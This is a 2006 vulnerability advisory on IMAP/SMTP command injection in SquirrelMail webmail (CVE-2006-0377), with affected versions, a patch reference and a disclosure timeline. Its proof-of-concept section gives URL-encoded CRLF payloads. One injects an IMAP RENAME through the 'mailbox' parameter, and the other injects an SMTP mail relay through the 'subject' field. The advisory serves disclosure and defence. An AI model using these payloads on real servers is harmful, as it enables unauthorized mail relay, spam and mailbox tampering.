=============================================
INTERNET SECURITY AUDITORS ALERT 2006-002
- Original release date: February 27, 2006
- Last revised: February 27, 2006
- Discovered by: Vicente Aguilera Diaz
- Severity: 3/5
=============================================
I. VULNERABILITY
-------------------------
IMAP/SMTP Injection in SquirrelMail


II. BACKGROUND
-------------------------
SquirrelMail is a standards-based webmail package written in PHP4. It
includes built-in pure PHP support for the IMAP and SMTP protocols,
and all pages render in pure HTML 4.0 (with no JavaScript required)
for maximum compatibility across browsers. It has very few
requirements and is very easy to configure and install. SquirrelMail
has all the functionality you would want from an email client,
including strong MIME support, address books, and folder manipulation.
The product homepage is http://www.squirrelmail.org.


III. DESCRIPTION
-------------------------
SquirrelMail provides a graphical interface to interact with mail
servers across the IMAP and SMTP protocols.
Improper command and information validation transmitted by
SquirrelMail to the mail servers during the normal use of this
application (mailbox management, e-mail reading and sending, etc.)
facilitates that an authenticate malicious user could inject arbitrary
IMAP/SMTP commands into the mail servers used by SquirrelMail across
parameters used by the webmail front-ent in its communication with
these mail servers.
This is become dangerous because the injection of these commands
allows an intruder to evade restrictions imposed at application level,
and exploit vulnerabilities that could exist in the mail servers
through IMAP/SMTP commands.


IV. PROOF OF CONCEPT
-------------------------

== IMAP example (1.4.2 version) =============
SquirrelMail Vulnerable parameter: "mailbox"

When a user clicks in the subject of an e-mail, he creates a GET
request as:
http://<victim>/src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1&show_more=0

A malicious user can modify the value of the "mailbox" parameter and
inject any IMAP command.
The IMAP command injection has the following structure:
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0<ID>
<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>
%20SELECT%20%22INBOX&passed_id=<CODE>&startMessage=1

Example:
Injection of the RENAME IMAP command across the "mailbox" parameter:
http://<victim>/src/read_body.php?mailbox=INBOX%22%0D%0AZ900%20RENAME%20Trash%20Basura%0d%0aZ910%20SELECT%20%22INBOX&passed_id=22197&startMessage=1



== SMTP example (1.2.7 version) =============
SquirrelMail Vulnerable parameter: "subject" (and possibly others)

When a user send a message, he create a POST request like:
POST http://<victim>/src/compose.php HTTP/1.1

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept
-----------------------------84060780712450133071594948441
...

A malicious user can modify the value of the "subject" parameter and
inject any SMTP command.
Example: Relay from a non-existent e-mail address

...
-----------------------------84060780712450133071594948441
Content-Disposition: form-data; name="subject"

Proof of Concept%0d%0a.%0d%0a%0d%0amail from:
hacker@domain.com%0d%0arcpt to:
victim@otherdomain.com%0d%0adata%0d%0aThis is a proof of concept of
the SMTP command injection in SquirrelMail%0d%0a.%0d%0a
-----------------------------84060780712450133071594948441
...


V. BUSINESS IMPACT
-------------------------
The IMAP/SMTP command injection allow relay, SPAM, exploit IMAP and
SMTP vulnerabilities in the mail servers and evade all the
restrictions at the application layer.


VI. SYSTEMS AFFECTED
-------------------------
IMAP Injection: All versions prior to 1.4.6.
SMTP Injection: SquirrelMail 1.2.7 (and older versions).


VII. SOLUTION
-------------------------
Replace \r and \n from $mailbox in the function sqimap_mailbox_select.
Patch available: http://www.squirrelmail.org/security/issue/2006-02-15


VIII. REFERENCES
-------------------------
- http://www.squirrelmail.org/security/issue/2006-02-15
- CVE-2006-0377


IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Vicente
Aguilera Diaz (vaguilera=at=isecauditors=dot=com).


X. REVISION HISTORY
-------------------------
January 12, 2006:  Initial release
January 20, 2006:  Disclosure timeline updated
February 16, 2006: Disclosure timeline updated
February 27, 2006: Disclosure timeline updated


XI. DISCLOSURE TIMELINE
-------------------------
December, 2005     Vulnerability acquired by Vicente Aguilera Diaz
                   (Internet Security Auditors)
January 12, 2006   Initial vendor notification sent.
January 19, 2006   The vulnerability is fixed in 1.4.6 cvs and
                   1.5.1 cvs.
February 15, 2006  The vendor published the vulnerability in the
                   security section.
February 25, 2006  The CVE-2006-0377 is updated.